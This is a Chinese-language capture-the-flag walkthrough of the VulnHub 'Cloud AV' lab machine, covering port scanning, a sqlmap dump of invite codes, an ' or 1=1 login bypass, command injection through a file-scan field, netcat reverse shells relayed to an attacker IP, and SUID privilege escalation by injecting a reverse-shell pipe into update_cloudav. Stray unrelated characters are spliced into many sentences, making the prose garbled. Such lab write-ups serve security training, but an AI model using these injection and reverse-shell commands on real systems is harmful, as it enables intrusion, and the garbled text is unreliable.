靶機(jī)信息
https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
滲透步驟
主機(jī)服務(wù)掃描
- arp-scan -l
- nmap -p- 192.168.0.101
- nmap -p8080 -sV 192.168.0.101
#8080運(yùn)行web服務(wù)
PORT STATE SERVICE VERSION
8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
MAC Address: 08:00:27:FA:B2:D0 (Oracle VirtualBox virtual NIC)
web滲透
- 訪問(wèn)http://192.168.0.101:8080/怀愧,掃描發(fā)現(xiàn)三個(gè)目錄翎嫡,兩個(gè)post接口圣勒,一個(gè)get接口
┌──(root??kali)-[/home/kali]
└─# dirsearch -u http://192.168.0.101:8080
[05:47:20] Starting:
[05:47:28] 200 - 2KB - /console
[05:47:35] 405 - 178B - /login
[05:47:36] 405 - 178B - /output
-
進(jìn)行sql注入瞳腌,發(fā)現(xiàn)輸入雙引號(hào) " 后程序會(huì)報(bào)錯(cuò)
- sqlmap掃描斟薇,有一張password表,有4條記錄
└─# sqlmap -u "http://192.168.1.48:8080/login" --data "password=1" --level 3 --risk 3 -T code -C password --dump
+--------------------+
| password |
+--------------------+
| myinvitecode123 |
| mysecondinvitecode |
| cloudavtech |
| mostsecurescanner |
+--------------------+
-
使用密碼登錄即可,或使用萬(wàn)能鑰匙 " or 1=1 --
命令注入
- 輸入框中輸入文件名钾虐,即可掃描鞭光,發(fā)現(xiàn)可能存在命令執(zhí)行漏洞吏廉;
-
命令執(zhí)行 hello1 | ls ,顯示可執(zhí)行命令
使用nc反彈shell
通用做法:
- 在攻擊主機(jī)上執(zhí)行端口監(jiān)聽nc -lvvp port
- 在目標(biāo)主機(jī)上執(zhí)行:nc -e /bin/bash 攻擊主機(jī)ip port
但是nc版本原因惰许,部分情況下 -e參數(shù)不能使用席覆;
- 在攻擊主機(jī)上打開兩個(gè)終端,分別監(jiān)聽 1234 和 4321 端口
- nc x.x.x.x 1234|/bin/bash|nc x.x.x.x 4321
- 得到反彈shell后汹买,1234 終端 輸入命令佩伤, 4321 終端就會(huì)獲得執(zhí)行相應(yīng)命令后的結(jié)果
suid提權(quán)
-
檢查目錄下存在可執(zhí)行文件 update_cloudav,同級(jí)目錄下有.c文件晦毙,考慮為c語(yǔ)言源碼畦戒。
-
同時(shí)檢查update_cloudav.c文件內(nèi)容,存在執(zhí)行命令語(yǔ)句结序。
- 在主機(jī)開啟6666、7777端口纵潦,執(zhí)行命令 ./update_cloudav "a| nc 192.168.0.104 6666 | /bin/bash | nc 192.168.0.104 7777"
知識(shí)點(diǎn)總結(jié)
- nc反彈shell
https://blog.csdn.net/qiuyeyijian/article/details/102993592#0x02_ncnetcat_33 - suid提權(quán) https://blog.csdn.net/shuteer_xu/article/details/104912790
- 命令注入 | || & && 的區(qū)別